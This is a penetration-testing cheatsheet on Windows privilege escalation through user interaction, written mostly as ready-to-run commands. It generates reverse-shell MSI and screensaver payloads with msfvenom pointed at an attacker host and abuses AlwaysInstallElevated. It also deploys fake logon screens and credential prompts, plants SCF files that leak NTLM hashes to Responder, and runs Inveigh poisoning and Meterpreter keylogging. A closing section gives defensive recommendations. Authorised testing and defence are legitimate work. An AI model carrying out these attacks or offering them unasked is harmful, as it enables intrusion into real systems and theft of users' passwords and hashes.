Field Manual

Windows PrivEsc Interacting Users

5 min read

πŸ›‘οΈ Methodology Checklist

  • Check AlwaysInstallElevated HKCU: reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
  • Check AlwaysInstallElevated HKLM: reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
  • Both = 1? Generate MSI payload: msfvenom -p windows/x64/shell_reverse_tcp ... -f msi
  • Install: msiexec /i payload.msi /quiet /qn /norestart
  • Deploy FakeLogonScreen or SharpLoginPrompt to capture user credentials
  • Check screensaver: reg query "HKCU\Control Panel\Desktop" /v SCRNSAVE.EXE
  • Run Inveigh for LLMNR/NBT-NS poisoning from Windows host

🎯 Operational Context

Use when: Standard privesc paths exhausted β€” use user interaction attacks (keyloggers, window interception, fake prompt) to capture admin credentials. Think Dumber First: If an admin is logged in and you have user-level access, Meterpreter keyscan_start captures everything typed including admin passwords. Screen capture (screenshot) confirms admin is active. These are passive β€” no crash risk. Skip when: No interactive admin session present on the target β€” these attacks require a logged-in target to interact with.

⚑ Tactical Cheatsheet

CommandTactical Outcome
.\SharpUp.exe auditFind AlwaysInstallElevated + other user-interaction vectors
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevatedCheck AlwaysInstallElevated for current user
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevatedCheck AlwaysInstallElevated system-wide
msfvenom -p windows/shell_reverse_tcp LHOST=[LHOST] LPORT=[LPORT] -f msi -o evil.msiGenerate MSI payload for AlwaysInstallElevated
msiexec /i evil.msi /quietInstall MSI β€” runs as SYSTEM if AlwaysInstallElevated enabled
C:\Windows\System32\Taskmgr.exe /4Launch Task Manager (DLL hijack target)
.\Responder.py -I [IFACE] -wvCapture NTLM hashes from user browsing
Invoke-InveighPowerShell LLMNR/NBNS/SMB poisoner for NTLM capture
.\FakeLogonScreen.exeFake Windows logon screen to capture user password
.\SharpLoginPrompt.exeDisplays credential prompt β€” captured to file/console
Set-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name SCRNSAVE.EXE -Value "C:\evil.exe"Set malicious screensaver for when user locks screen

πŸ”¬ Deep Dive & Workflow

AlwaysInstallElevated β€” MSI SYSTEM Escalation

# Check both registry keys β€” BOTH must be set to 1
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
# β†’ AlwaysInstallElevated    REG_DWORD    0x1
 
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
# β†’ AlwaysInstallElevated    REG_DWORD    0x1
 
# If both = 1 β†’ MSI packages install as SYSTEM
 
# Generate payload MSI
msfvenom -p windows/shell_reverse_tcp LHOST=[LHOST] LPORT=[LPORT] -f msi -o evil.msi
 
# Execute (elevates automatically to SYSTEM)
msiexec /i \\[LHOST]\share\evil.msi /quiet /qn /norestart
# or local:
msiexec /i C:\temp\evil.msi /quiet

PowerUp detection: Invoke-AllChecks catches this and auto-generates payload under the β€œAlwaysInstallElevated” finding.

Fake Logon Screen β€” Physical/RDP User Capture

# Deploy FakeLogonScreen (blocks real desktop)
# Requires interactive session (not just shell)
.\FakeLogonScreen.exe
# β†’ Displays pixel-perfect Windows login screen
# β†’ Captures typed password β†’ saves to file or displays in terminal
# β†’ Dismiss: type anything and it falls through
 
# Or SharpLoginPrompt (pops credential dialog)
.\SharpLoginPrompt.exe
# β†’ Standard Windows auth dialog (looks legitimate)
# β†’ Returns typed credentials to console

When to use: During physical access, RDP session, or if you have GUI access and target user is expected to authenticate shortly.

NTLM Hash Capture via Responder (Local)

# If you can place a file that triggers UNC path access:
# Create malicious file (e.g., in shared dir, desktop, email attachment)
# β†’ user opens folder β†’ Windows tries UNC path β†’ sends NTLM to attacker
 
# Embed UNC trigger in .scf file:
echo "[Shell]" > @evil.scf
echo "Command=2" >> @evil.scf
echo "[Taskbar]" >> @evil.scf
echo "Command=ToggleDesktop" >> @evil.scf
echo "[Shell]" >> @evil.scf
echo "[Shell]" > @trigger.ini
# More effective: icon path pointing to attacker
# β†’ File Explorer auto-requests the UNC path without user opening the file
 
# Attacker captures with Responder:
sudo ./Responder.py -I [IFACE] -wv
# Crack captured NTLMv2: hashcat -a 0 -m 5600 hash.txt rockyou.txt

Malicious Screensaver

# If you have user-level access and can wait for them to lock:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=[LHOST] LPORT=[LPORT] -f exe -o evil.exe
copy evil.exe C:\Windows\Temp\evil.scr
 
# Set as screensaver
Set-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name SCRNSAVE.EXE -Value "C:\Windows\Temp\evil.scr"
Set-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name ScreenSaveActive -Value "1"
Set-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name ScreenSaverIsSecure -Value "0"
Set-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name ScreenSaveTimeout -Value "60"
 
# β†’ After 60 seconds of inactivity β†’ shell executes as current user
# β†’ If current user has admin token β†’ SYSTEM payloads viable after UAC bypass

Traffic Capture with Inveigh (PowerShell)

# Inveigh = PowerShell Responder equivalent
Import-Module .\Inveigh.ps1
Invoke-Inveigh -ConsoleOutput Y -NBNS Y -LLMNR Y -FileOutput Y
 
# After capture, view results:
Get-InveighLog
Get-InveighNTLMv2   # NTLMv2 hashes
 
# Stop:
Stop-Inveigh

Resource-Based Constrained Delegation (via User Interaction)

# If you have GenericWrite on a computer object:
# β†’ Set msDS-AllowedToActOnBehalfOfOtherIdentity
# β†’ Impersonate any user to that machine
# β†’ See AD_Bleeding_Edge for RBCD details

πŸ› οΈ Troubleshooting & Edge Cases

ProblemCauseFix
Meterpreter keyscan needs migrationLow-privilege processMigrate to a user-context process first: migrate [EXPLORER_PID] or desktop process
Fake prompt PowerShell blockedAMSI or execution policyUse pre-built binary for credential prompt; or use Invoke-CredentialPhish from memory
Screenshot returns black screenProcess not in desktop sessionMigrate to session 1 process (interactive desktop); ps and find Session=1 processes
Keylogger missing keystrokesNot in correct sessionVerify session: Meterpreter getpid; migrate to PID running in user session
User not responding to fake promptPrompt not visibleUse shell + msg * Please verify your credentials to continue to alert user to check screen

πŸ“ Reporting Trigger

Finding Title: Credential Capture via Active User Session Keylogging Impact: Keylogging of an active administrator session captures plaintext credentials for privileged accounts as they are typed, without any cryptographic bypass or exploitation β€” providing admin credentials through passive monitoring of legitimate user activity. Root Cause: Low-privileged process can migrate into or monitor a privileged user’s desktop session. No behavioral monitoring of process injection into explorer.exe or keyboard hook installation. Recommendation: Implement Privileged Access Workstations (PAWs) where admin sessions are physically separated from regular user sessions. Deploy EDR to detect keyboard hook installation and session monitoring behaviors. Implement session isolation between user and admin contexts.

πŸ”— Related Nodes

Graph View